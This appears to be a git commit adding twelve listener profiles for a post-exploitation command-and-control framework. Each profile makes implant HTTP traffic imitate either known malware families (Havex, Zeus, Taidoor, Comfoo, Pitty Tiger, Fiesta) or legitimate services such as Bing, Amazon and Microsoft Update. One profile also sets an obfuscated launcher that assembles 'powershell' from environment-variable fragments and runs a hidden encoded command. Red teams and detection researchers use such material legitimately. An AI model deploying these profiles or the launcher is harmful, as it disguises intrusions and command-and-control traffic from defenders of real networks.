Update Profile

master
root 2018-07-06 13:33:33 +07:00
parent 552c496890
commit d396f5a4ac
12 changed files with 141 additions and 0 deletions

View File

@ -0,0 +1,11 @@
# Basic comfoo profile
# http://www.secureworks.com/cyber-threat-intelligence/threats/secrets-of-the-comfoo-masters/
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/comfoo.profile
listeners
uselistener http
set Name comfoo
set DefaultDelay 30
Set DefaultJitter 20
set DefaultProfile /CWoNaJLBo/VTNeWw11212/|Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)|Keep-Alive:timeout=15, max=90|Accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*|Accept-Language:en-en|Connection:Keel-Alive|Cache-Control:no-cache
set Headers Server:Apache/2.0.50 (Unix)|Keep-Alive:timeout=15, max=90

View File

@ -0,0 +1,10 @@
# havex trojan C&C profile
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/havex.profile
listeners
uselistener http
set Name havex
set DefaultDelay 30
Set DefaultJitter 0
set DefaultProfile /include/template/isx.php,/wp06/wp-includes/po.php,/wp08/wp-includes/dtcla.php,/modules/mod_search.php,/blog/wp-includes/pomo/src.php,/includes/phpmailer/class.pop3.php|Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08|Referer:http://www.google.com|Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
set Headers Server:Apache/2.2.26 (Unix)|X-Powered-By:PHP/5.3.28|Cache-Control:no-cache|Content-Type:text/html|Keep-Alive:timeout=3, max=100

View File

@ -0,0 +1,11 @@
# Basic Pitty Tiger RAT profile
# http://bitbucket.cassidiancybersecurity.com/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/pitty_tiger.profile
listeners
uselistener http
set Name ocsp
set DefaultDelay 30
Set DefaultJitter 20
set DefaultProfile /FC001/JOHN|Microsoft Internet Explorer|Host:newb02.skypetm.com.tw|Connection:keep-alive
set Headers Content-Type:text/html|Server:IIS5.0

View File

@ -0,0 +1,11 @@
# Taidoor Profile
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/APT/taidoor.profile
listeners
uselistener http
set Name taidoor
set DefaultDelay 40
Set DefaultJitter 35
set DefaultProfile /login.jsp,/parse.jsp,/page.jsp,/default.jsp,/index.jsp,/process.jsp,/security.jsp,/user.jsp|Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)|Connection:Keep-Alive|Cache-Control:no-cache
set Headers Server:Microsoft-IIS/5.0|Content-Type:text/html|Connection:close

View File

@ -0,0 +1,11 @@
# Fiesta Exploit Kit traffic profile
# http://malware-traffic-analysis.net/2014/04/05/index.html
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/fiesta.profile
listeners
uselistener http
set Name fiesta
set DefaultDelay 30
Set DefaultJitter 10
set DefaultProfile /rmvk30g/|Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11|Acccept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
set Headers Server:Apache/2.2.15 (CentOS)|X-Powered-By:PHP/5.3.27|Content-Type:application/octet-stream|Connection:close

View File

@ -0,0 +1,11 @@
# Basic Zeus variant profile
# https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/crimeware/zeus.profile
listeners
uselistener http
set Name zeus
set DefaultDelay 30
Set DefaultJitter 5
set DefaultProfile /metro91/admin/1/ppptp.jpg,/metro91/admin/1/secure.php|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)|Host:mahamaya1ifesciences.com|Cache-Control:no-cache|Accept-Encoding: deflate, gzip;q=1.0, *;q=0.5|Accept:*/*
set Headers Server:nginx/1.0.4|Content-Type:text/html|Connection:close|X-Powered-By:PHP/5.3.8-1~dotdeb.2

View File

@ -0,0 +1,13 @@
# Amazon browsing traffic profile
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name amazon
set DefaultJitter 0
set DefaultDelay 5
set DefaultProfile /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=book,/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe&sn=91191&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|host:www.amazon.com|accept:*/*
set Headers Server:Server|x-amz-id-1:THKUYEZKCKPGY5T42PZT|x-amz-id-2:a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=|X-Frame-Options:SAMEORIGIN|x-ua-compatible: IE=edge

View File

@ -0,0 +1,14 @@
# Bing Web Search
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/bingsearch_getonly.profile
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name bing
set DefaultJitter 20
set DefaultDelay 6
set DefaultProfile /search?q=news&qs=n&form=QBLH,/search?q=sport&qs=n&form=QBLH,/search?q=health&qs=n&form=QBLH|Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko|Host:www.bing.com|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
set Headers Server:Microsoft-IIS/8.5|Cache-Control:private, max-age=0|Content-Type:text/html; charset=utf-8|Vary:Accept-Encoding
set Launcher CmD.ExE /c start %allusersprofile:~3,1%%allusersprofile:~5,1%%windir:~3,1%%localappdata:~5,2%%windir:~9,1%he%localappdata:~-1%%localappdata:~-1% -nOP -STa -w 1 -ec

View File

@ -0,0 +1,13 @@
# Microsoft Update
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/microsoftupdate_getonly.profile
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name microsoftupdate
set DefaultJitter 20
set DefaultDelay 6
set DefaultProfile /c/msdownload/update/others/2013/11/9946821_f5082b842c8abc5c47cfc68f98340ec384b69fa9.cab,/c/msdownload/update/software/ftpk/2013/11/ie-spelling-nl_3576e6450352dfc0c0892bf62384e75a56d780a7.msu|Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40|Host:download.windowsupdate.com|Accept:*/*"
set Headers Content-Type:application/vnd.ms-cab-compressed|Server:Microsoft-IIS/8.5|MSRegion:N. America|Connection:keep-alive|X-Powered-By:ASP.NET

View File

@ -0,0 +1,12 @@
#
# Online Certificate Status Protocol (OCSP) Profile
# http://tools.ietf.org/html/rfc6960
#
listeners
uselistener http
set Name ocsp
set DefaultDelay 20
Set DefaultJitter 20
set DefaultProfile /oscp/,/oscp/a|Microsoft-CryptoAPI/6.1|Accept:*/*|host:ocsp.verisign.com
set Headers content-type:application/ocsp-response|content-transfer-encoding:binary|cache-control:max-age=547738, public, no-transform, must-revalidate|connection:keep-alive

View File

@ -0,0 +1,11 @@
# Standard Pandora traffic profile
#
# https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/pandora.profile#L11
listeners
uselistener http
set Name bing
set DefaultJitter 0
set DefaultDelay 1
set DefaultProfile /access?version=4&lid=1582502724|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Accept:*/*|GetContentFeatures.DLNA.ORG:1|Host:audio-sv5-t1-3.pandora.com
set Headers Server:Apache|Cache-Control:no-cache, no-store, must-revalidate, max-age=-1|Pragma:no-cache, no-store|Connection:close|Content-Type:audio/mp4

View File

@ -0,0 +1,13 @@
#
# Safebrowsing Comms profile
# https://code.google.com/p/google-safe-browsing/wiki/SafeBrowsingDesign
#
# Author: Rahmat Nurfauzi - @infosecn1nja
listeners
uselistener http
set Name safebrowsing
set DefaultJitter 20
set DefaultDelay 60
set DefaultProfile /safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate
set Headers Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8|Accept-Language:en-US,en;q=0.5|Accept-Encoding:gzip, deflate